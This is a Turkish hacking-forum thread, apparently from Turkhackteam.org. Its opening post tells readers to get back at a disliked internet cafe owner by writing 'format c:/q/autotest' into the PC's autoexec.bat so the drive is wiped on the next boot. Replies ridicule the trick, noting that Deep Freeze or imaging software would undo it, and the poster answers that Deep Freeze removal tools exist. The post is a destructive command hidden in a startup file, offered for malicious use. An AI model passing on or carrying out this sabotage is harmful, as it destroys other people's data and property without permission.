Cafe Bilgisayarina Format

black shark

Katılımcı Üye
15 Eyl 2006
413
5
Sinir Oldugunuz Cafecının Bılgısayarına FormaT
Simdi Bi cafeye gittiniz ama cafe sahibine uyuz oldunuz onu uyuz etmek için
gidin makinaya oturun ve isinizi görün internete girin oyun oynayın ve sonuçta gıcıklık ya kalmadan 5 dakka önce o makinadaki

c nin içinde bulunan autoexec.bat dosyasını not defteriyle ac
içine "format c:/q/autotest"

yaz ve kaydet ama "" işaretleri olmadan sen sonra gidesin ordan bilgisayar kapatılıp yeniden acıldığı zaman formatı yer. kolay gelsin)))

ksab264ster

Yeni üye
21 Eyl 2006
1
0
ya senmi gerizekalısın yoksa bizmi.? O cafede Deepfreeze yada trueimage varsa ne b*k yiyeceksin.. kendi *ötünemi güleceksin.. Zaten tüm cafelerde
formatlanmaya hazır bekliyor.. senin gibi bir *alak gelsinde formatlasın diye
Cafecinin değmedik bir kulağının arkası kalmıştır. haberin olsun..

black shark

Katılımcı Üye
15 Eyl 2006
413
5
ya senmi gerizekalısın yoksa bizmi.? O cafede Deepfreeze yada trueimage varsa ne b*k yiyeceksin.. kendi *ötünemi güleceksin.. Zaten tüm cafelerde
formatlanmaya hazır bekliyor.. senin gibi bir *alak gelsinde formatlasın diye
Cafecinin değmedik bir kulağının arkası kalmıştır. haberin olsun..
kardeşş biraz konuşmalarına dikkat et istersen bi sürü Deepfreeze kaldırıcı program var ister kullanırsın ister kullanmazsın

serdaront

Yeni üye
17 Tem 2008
44
0
Ewet birincisi günümüzde deepfreeze kullanmayan cafe yok, ikincisi ise bana deepfreeze 6 ve üstünü devre dışı birakan bir tane proğram söylermisiniz.biostan saatimi değiştireceksiniz :) onuda deneyin isterseniz^^

Son düzenleme:

blacktime

Yeni üye
7 May 2008
28
0
aynen arkadasım sana katılıyorum bende ınternet cafe işletıyorum ne kadar sacma laflar kuruyorsunuz neymıs kafanın sahıbıne gıcık oldun format at pc cok da kolaydı sen gel cafeme otur bı pc hıcbır bok yapamazsın

juankartal

Yeni üye
22 Tem 2008
12
1
s.aleykum millet yeni üye oldum da ben bu konuyu yeni gördüm internet cafelerde defferez denen programlar var kapatıp açınca zaten o degişiklik yok olur yanılıyomuyum cevap yazarsanız sevinirim

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.